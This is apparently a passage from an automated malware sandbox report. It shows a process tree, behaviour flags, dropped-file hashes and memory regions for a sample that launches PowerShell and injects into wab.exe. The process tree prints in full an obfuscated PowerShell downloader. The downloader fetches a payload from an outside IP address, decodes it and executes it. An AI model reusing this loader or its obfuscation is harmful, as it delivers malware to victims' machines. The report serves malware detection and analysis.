Kalek=Congr Court[K rtoS ,ortyAr,ensBolshtParene L,njmMechi.ungluC,andso UnspnRebukvRingmeTriglrAnn.atUvede]Fac o:Thero:K.ogeFIndisrRemulo Smr,m NontB lut.ati,essStewaeMichf6 exit4EskadSblgfrtOrthorPlantistorsnUndergUnder(Hunds$UhelbCP incoChiefrSkovpaAnticcRens.olae emEquimoUnrefrY.step.lipchBarbliAndedc Krig)Lurda ');Unbelieffulness (Ellipsen 'Retrt$UopsagKronrl.ordyoBirumb P staDdninl Grot: IvyfU,aldsdS,rums VitapFrimrrHedo jCo,citVelkleZircodCullieKopul Mili=udrin B.tnk[HjtalS Bakey nhibsAbsolt.rpaoesjattmAareg.WhiftT afreeMucipxPolsttReadv.Galv.Etendon f rlcRekomoKapitdchrysit.esmnDybdegFedtp]Knubb:Nonbe:DeledA heaSGerl,COvereIfjer.IAlsea.TolseGFrejdeRotcetDanneSHo,dwt.versrBes,ni Landn UngrgS aki(Sparr$OvercA SnubnMesmesOvermpUdelinElapodDe,ibt C ppePolypsHentr) E.er ');Unbelieffulness (Ellipsen 'E tri$UndergOtidil ,orroKonkubGldsbaKnsrol Wa,h:truncSSnkekpUligerAmeriaunseqiCirc tTuberh .riv=Festr$ DiscU MikidDuvetsUncatpDatoerAppuljClusttGe.anevandldSjofeeK,mle.FeakesUgedauStivnb EkspsWhimbtPalaer AboniV,abenBevrtgPhlo (Revis3Tilko0Siali4Qua.t8Clado6 Flug8Forur,Conf 2 Para8Hydro9,avor4,stra9Forha)Wisco ');Unbelieffulness $Spraith;"3⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2852 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tydelighedens.Sto && echo $"4⤵PID:320
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Sakkede = 1;$Glycosidase='Substrin';$Glycosidase+='g';Function Ellipsen($retninslinier){$Stigningshastighedshj=$retninslinier.Length-$Sakkede;For($Stigningshastighed=5; $Stigningshastighed -lt $Stigningshastighedshj; $Stigningshastighed+=(6)){$Haandtaskers+=$retninslinier.$Glycosidase.Invoke($Stigningshastighed, $Sakkede);}$Haandtaskers;}function Unbelieffulness($Skeletteringen){& ($Pietoso) ($Skeletteringen);}$Hable=Ellipsen 'CykelMSa dfoCitrozMalteiRy,stlAdheslBakkearelat/,some5Farao.Optrk0Ligas overc( trkWFugtdiTrimmnAutosd Uncoo,verhwscrewsOmni, CompNQuiltTSpeec Fre s1 Babe0D,aly.L.nti0 Wels;Scuti B undW Urodi SigtnBreek6 erra4Unbon;Av rt Ka edx Aq,a6 Mili4Risik; vodi Raveir SkrmvR,gni:Compa1Dyhrs2Feath1Popli.M nte0Sulfo) Fath Pha.oGUrremeEpithcIndvak ProtoPinak/Idiot2B.ase0Uneva1B aaj0Grimi0De,ol1Kanto0Bryll1hyper HarpuFAvlstiProsorTangfearrayfForsmo exadx Rupi/Te eb1 Bepr2Tvrfl1Fjerp.Mistl0Byge, ';$Desponsage=Ellipsen ' ForsU PalesStre eHester Gwer-Bi.frA .ildgcarabeSubvenTomjot mbyg ';$Blushwort=Ellipsen ' ned hMo,ntt sepatKa aspRomu :V nfr/Pr te/Fi,an2Panti3Boa.d. Pycn9Noncr5sjask.syna.6Impre0Ansig.Kalde7Unspr7Dobbe/BoltoFNy,tao Ch,arDrailvSkrd.rLovewi,oulad.onurePelvisSnrkl.T,lepp.etrosAgaladMarme ';$Forretningsstederne=Ellipsen 'S,enc> Fuel ';$Pietoso=Ellipsen 'BlikkiCrypteSuperx ande ';$Theres207='Sljt';Unbelieffulness (Ellipsen ' DrabS S.ine Webbt Avia- LignCAkt eoGylp,n BesttAndase ,tann trkt St.t Ubevi-UnblePtrevlaGa,agtBevilh.ackl MidtpTVer,e:Komma\StreeA DodemC moei PartcOp,iceGormasDybtr.A chatRou.hxDagbdtDybfr Magu-KrigsVCroona.nkeplSpritusidere .nlo Shunt$IndkaTUhde.hSti,pePlegar KonteHo nesAnt.r2 Mat 0Ly be7Unabo;Ignor ');Unbelieffulness (Ellipsen 'fr,dei SpecfDdsst Tr.s(GeocetGeirceImplasUnipotChanc-SslugpUnyokaWontot.tavrhEvalu UnparT Kong:Formf\FarveARepo.mSkubbiBes.rc LimpeCert sC ypt.FlueftJernbxPy.ost Sail)Demob{VrdileDulcixOccipiG amotRepli}M,dde;stjni ');$Albuminernes = Ellipsen '.nddreHauchc U.ifh D,nloIsoto Fl.t%SwathaAnatopWo mhpBe.endGrannaRotart ereaSkeln%Goeth\Off,nTDobbeyDingldSvin eSim,llAttr,iBiotogLabanh Woode Fored Nutle St,cn BlansTungn. .ndrSHejretUnconoSpnt. proeq&Orang&Hoved DysureE,thec .illhTilsaoHawkl Ctrfi$Polla ';Unbelieffulness (Ellipsen ' Trkv$ overgNekrolReseroDorybbBrugsa RufulNargi:AfskeB ga,ae,alvamOb.eca Ameln KnesdOver eManusnElided RetueSymbo3Wimpl4hyoli=dmodm(Pr.lic ResmmCharldun ou Fregn/IntercTurnt un,er$Kap tAGaardlInvalb,lapbuF nktm ,obai Ci.en IntweTthedrIstidn Mil e Anlgs.eden)Do be ');Unbelieffulness (Ellipsen ' dval$Forpug,orselMa,aio Skosb MoleaKlapplLoop,:MicroEFirsifBewidtArrive U avrShemolColisyArgemsEsbennParani SilknZinnngFar e=Asham$Syl,aBMan,blGenopuOatlasFr,mbhMoon wPrussoProporpolittMisgu. Lemms SaggpPretrlAdduciDust.tDjesi( Hi l$ PogrFAbro.oActuargaulorForsaeAmor tFresnnU.deriPla.en HjemgLslodsDromesBa attSdekoeByzand repeeChlorr Str,n.edimeK lor)Fagbe ');$Blushwort=$Efterlysning[0];Unbelieffulness (Ellipsen 'Repar$ ForhgAnienlLuftto SparbTricyaSpiculS mic:EndomTSubhoi SpeclInjurb Kkkea airggFortyeB.zaabCongolAel reHillov StaneTyroct iss=Unde NF.gleeBullewHerbb- inhaOReklabExterjTropeeRashlc ElietBello Ma emS eeksyTeet,sGlobetPincueSt,tam U.pe.u,wieN enereUdk,gt Deno.IndleW erte StrobSku,sCO,drelunreciLitu,eAdminnFirett pect ');Unbelieffulness (Ellipsen ' Stat$tas.wT OsteiIvorylStu,kbHandeaNamergReekieV,diub ErytlIrreveSideovSlendeK,nertbrigg.CorkiH R dieEldoraTintadZi.asePi,lerBo uns Yerb[Overs$ ambsDvirtueEnsaisRvejapSk.peo kkornD,spos EatoaVallegStatseSkri,]Match=Terma$BarviHIsoemaDue.tbLandmlFicheeSonan ');$Ulempefriere=Ellipsen '.dvarT Ry,eiFul.klbotilbDogleaE sprg Ekste ajgbVvstyl,releeUdlndv F,ereTndertDumbe.Rode D DataoColliwF,dignKeefslIlmenoLilleaF,rved G,naF ,rbeiDragalNeslaeGgem,(Unamu$ SepaBUmistlAnthouFjsinsRkebih,tjkowPrestoTil,nrHet rtNo.dm,Duble$ Dat SInterhIndicakalyprRegavkVasopeoverbrSkyll3Besla7Selsk)Renov ';$Ulempefriere=$Bemandende34[1]+$Ulempefriere;$Sharker37=$Bemandende34[0];Unbelieffulness (Ellipsen 'Fanta$Frugtg tittlLecheoZithebKlapja,nporlSprin:FourcBPseudaPartinSmaa d VexaaModtag Uniti Tr.vsHu metc,mpee CatarGradunmu.tie FlamsNedsk5Forho3vgtkl=Keren(PrintTOrdste .eilsNu,natDoere- DublP H,lla An,mt UparhGerle Rod.h$ScopeSAelurhSphenaGrnserRasgakAntrueVoldtr,inne3Conve7 indi)L,tdo ');while (!$Bandagisternes53) {Unbelieffulness (Ellipsen ' Cotw$Gherkg CudglKaolioDrabsbStefaatrla.lS.fii:suzetEF,rsgmHydroyG,rgldMyocae AudiaDissy=Hypot$ Solat ierarRectiuKnibee adon ') ;Unbelieffulness $Ulempefriere;Unbelieffulness (Ellipsen ' HavaS Brn tMi adaLnsatr SlittUnipe-LigevSDaadylPolyceRestreTi idpSlang Hundj4Akt,r ');Unbelieffulness (Ellipsen 'Enegn$EntregPr.molSplk,oCoberb.korpa Fejll Tu,g:GastrBRenteaBlindnCon.idHe.eraforesg Gebii BondsSu,katchummeBamlerUnca,nYata,e Indts.eiru5 Ualm3hippo=Boras(Pr.prT Tor eTranss Z,ndtF mkr-DirecPVanuaa UnmutSulfihAnar, Ety,o$FactoS,jlpehDobbea MilirBackikAntipeChillr Nitr3 Spec7Labor)Icono ') ;Unbelieffulness (Ellipsen 'Peppe$ForudgRetdrlKandioArbejbBordeaRaabal Cyph:St.alsHinknkSub lis.nsefUsseltdiseseRe iofF nato PrebrSok lrPastoeFiltetPopuln,naldiDobben PringudesteBrugsr SybosChoki=After$ Mer.g PejllReassoBodyubMaddiaDisrelY,sin:TelevU anyipG,byrpBlamai M,drs Tredh alfulBefoly.eath+ Feel+Ubevi%F.rud$MalerEoksesfOdy.st QuareTro.frpickelEjahuyAntydsRodskn Sheai Lucen Ledng Iodo.Paapac GgepoKommau Pas.nNongetMes,e ') ;$Blushwort=$Efterlysning[$skifteforretningers];}Unbelieffulness (Ellipsen ' Dev $ TftegW odslBeeleoSuffebGeograRetsplMisos:CytocCSkraboCommor KnopaNegrecVeludoA vinmKanceoSk,umrSubpopAn hrh NonaiM drecHaves Comm=Refa, underG GejleThioht R.od- S opCRenego Bi snAb nntScoreeLigninHoe.ttAuten In r$ Ca,dSPa hlh,ejemaDionyr Splek.ranseper ar .ank3Unpro7Faste ');Unbelieffulness (Ellipsen 'Sk tt$Lev,vgInd.slStddmoWoohobgo.era Sp,glD.mye:FiercA,prinnZwittsVenerpJgerknSkov dprogrtRorideHedwisVelma Kalek=Congr Court[K rtoS ,ortyAr,ensBolshtParene L,njmMechi.ungluC,andso UnspnRebukvRingmeTriglrAnn.atUvede]Fac o:Thero:K.ogeFIndisrRemulo Smr,m NontB lut.ati,essStewaeMichf6 exit4EskadSblgfrtOrthorPlantistorsnUndergUnder(Hunds$UhelbCP incoChiefrSkovpaAnticcRens.olae emEquimoUnrefrY.step.lipchBarbliAndedc Krig)Lurda ');Unbelieffulness (Ellipsen 'Retrt$UopsagKronrl.ordyoBirumb P staDdninl Grot: IvyfU,aldsdS,rums VitapFrimrrHedo jCo,citVelkleZircodCullieKopul Mili=udrin B.tnk[HjtalS Bakey nhibsAbsolt.rpaoesjattmAareg.WhiftT afreeMucipxPolsttReadv.Galv.Etendon f rlcRekomoKapitdchrysit.esmnDybdegFedtp]Knubb:Nonbe:DeledA heaSGerl,COvereIfjer.IAlsea.TolseGFrejdeRotcetDanneSHo,dwt.versrBes,ni Landn UngrgS aki(Sparr$OvercA SnubnMesmesOvermpUdelinElapodDe,ibt C ppePolypsHentr) E.er ');Unbelieffulness (Ellipsen 'E tri$UndergOtidil ,orroKonkubGldsbaKnsrol Wa,h:truncSSnkekpUligerAmeriaunseqiCirc tTuberh .riv=Festr$ DiscU MikidDuvetsUncatpDatoerAppuljClusttGe.anevandldSjofeeK,mle.FeakesUgedauStivnb EkspsWhimbtPalaer AboniV,abenBevrtgPhlo (Revis3Tilko0Siali4Qua.t8Clado6 Flug8Forur,Conf 2 Para8Hydro9,avor4,stra9Forha)Wisco ');Unbelieffulness $Spraith;"4⤵
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1744 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tydelighedens.Sto && echo $"5⤵PID:1616
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"5⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2076
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotmFilesize
20KB
MD5f88e984e20b395cd404e143ea731d172
SHA1c56f649c32ae4a99368364b70b975e0c05bd0577
SHA256d301a3cf174d293a18b62d2695a0ecc7d131e7ccf0af3a39c340cd5b771543e7
SHA512b1726338f10949b443bb23a1a2cbc41fc3b98ffef2277e624c7ba4b1a7e8897229253ffdced60b536302e0df740949a8ac829318500ca0a6263135c1008a14b1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD5315f2bb8674e090f21b05322a3911c57
SHA165d06ea4f3b2978f926830167f8fe38790da9fe5
SHA25652d94a7ffcaf9d397ce96a445b337929d5c3ae76a4b9519e53e7cb7e159c226c
SHA5128c638d5b00a1807e25b5a898c13faf9d30fdf11f06603fd9a0a74b6b459daa1cda0df7a58517374b58ebe2f1ab9f0b7979896fc5def5e9b23cbe3510f96fe3fb
-
C:\Users\Admin\AppData\Roaming\Tydelighedens.StoFilesize
434KB
MD5d5dd560eda26eac1265d7857f5fc4ff9
SHA1f61199b0cfa0d630aef32402e9c8f49c31a0cc71
SHA256ec74b4265f8874908d904eda09477d4e9d6fd8cc4c2f23e48df70e3d922c3e49
SHA5126d206f43c074936783402990b112a23792fc64d72ecae45368c92f1d5c15371ab26caa001a8dd17fdbdacb72f650e34b7d3f6980631a192750b6479ba7577d17
-
C:\Users\Admin\AppData\Roaming\eveningxlamonkey.vbsFilesize
7KB
MD5fc76593b1fea2b3f3b0408db187f4b50
SHA1726281cc7bc010062290e79a8682ef00d96cc39e
SHA256acf6f65f5de2207b521909f21a3ebbbbe94a6352094c26cc8c49388d75e32c2c
SHA51271e286961e85dbd8e116817d2f58f5886d9c92c81130f1e54061775c5572b9e154ca39e6b5afa38bd216c844fb3ceb5d176d28bdefea40c36af66d75053896ab
-
memory/1744-44-0x00000000029F0000-0x0000000002A30000-memory.dmpFilesize
256KB
-
memory/1744-45-0x00000000055C0000-0x00000000055C1000-memory.dmpFilesize
4KB
-
memory/1744-46-0x00000000066D0000-0x000000000991F000-memory.dmpFilesize
50.3MB
-
memory/1744-47-0x00000000066D0000-0x000000000991F000-memory.dmpFilesize
50.3MB
-
memory/1744-63-0x00000000066D0000-0x000000000991F000-memory.dmpFilesize
50.3MB
-
memory/1744-55-0x00000000066D0000-0x000000000991F000-memory.dmpFilesize
50.3MB
-
memory/1744-51-0x0000000077C10000-0x0000000077CE6000-memory.dmpFilesize
856KB
-
memory/1744-50-0x00000000029F0000-0x0000000002A30000-memory.dmpFilesize
256KB
-
memory/1744-34-0x000000006B680000-0x000000006BC2B000-memory.dmpFilesize
5.7MB
-
memory/1744-35-0x00000000029F0000-0x0000000002A30000-memory.dmpFilesize
256KB
-
memory/1744-36-0x000000006B680000-0x000000006BC2B000-memory.dmpFilesize
5.7MB
-
memory/1744-37-0x00000000029F0000-0x0000000002A30000-memory.dmpFilesize
256KB
-
memory/1744-49-0x000000006B680000-0x000000006BC2B000-memory.dmpFilesize
5.7MB
-
memory/1744-39-0x0000000005650000-0x00000000056AC000-memory.dmpFilesize
368KB
-
memory/1744-40-0x0000000002B10000-0x0000000002B1A000-memory.dmpFilesize
40KB
-
memory/1744-48-0x0000000077A20000-0x0000000077BC9000-memory.dmpFilesize
1.7MB
-
memory/1744-41-0x0000000005590000-0x00000000055A0000-memory.dmpFilesize
64KB
-
memory/2076-58-0x0000000000F90000-0x0000000001FF2000-memory.dmpFilesize
16.4MB
-
memory/2076-57-0x0000000077C46000-0x0000000077C47000-memory.dmpFilesize
4KB
-
memory/2076-61-0x0000000000F90000-0x0000000000FD2000-memory.dmpFilesize
264KB
-
memory/2076-60-0x0000000000F90000-0x0000000001FF2000-memory.dmpFilesize
16.4MB
-
memory/2076-70-0x0000000020A70000-0x0000000020AB0000-memory.dmpFilesize
256KB
-
memory/2076-65-0x0000000020A70000-0x0000000020AB0000-memory.dmpFilesize
256KB
-
memory/2076-62-0x0000000065EA0000-0x000000006658E000-memory.dmpFilesize
6.9MB
-
memory/2076-56-0x0000000077C10000-0x0000000077CE6000-memory.dmpFilesize
856KB
-
memory/2076-69-0x0000000065EA0000-0x000000006658E000-memory.dmpFilesize
6.9MB
-
memory/2076-52-0x0000000002000000-0x000000000524F000-memory.dmpFilesize
50.3MB
-
memory/2076-54-0x0000000077A20000-0x0000000077BC9000-memory.dmpFilesize
1.7MB
-
memory/2076-66-0x0000000002000000-0x000000000524F000-memory.dmpFilesize
50.3MB
-
memory/2372-0-0x000000002F9F1000-0x000000002F9F2000-memory.dmpFilesize
4KB
-
memory/2372-2-0x00000000717FD000-0x0000000071808000-memory.dmpFilesize
44KB
-
memory/2372-42-0x00000000717FD000-0x0000000071808000-memory.dmpFilesize
44KB
-
memory/2372-1-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/2372-91-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/2852-15-0x000000006B680000-0x000000006BC2B000-memory.dmpFilesize
5.7MB
-
memory/2852-26-0x0000000005570000-0x00000000055CC000-memory.dmpFilesize
368KB
-
memory/2852-64-0x000000006B680000-0x000000006BC2B000-memory.dmpFilesize
5.7MB
-
memory/2852-16-0x0000000002AE0000-0x0000000002B20000-memory.dmpFilesize
256KB
-
memory/2852-27-0x0000000005520000-0x000000000552A000-memory.dmpFilesize
40KB
-
memory/2852-28-0x0000000005650000-0x0000000005660000-memory.dmpFilesize
64KB
-
memory/2852-22-0x0000000002AE0000-0x0000000002B20000-memory.dmpFilesize
256KB
-
memory/2852-21-0x000000006B680000-0x000000006BC2B000-memory.dmpFilesize
5.7MB
-
memory/2852-43-0x000000006B680000-0x000000006BC2B000-memory.dmpFilesize
5.7MB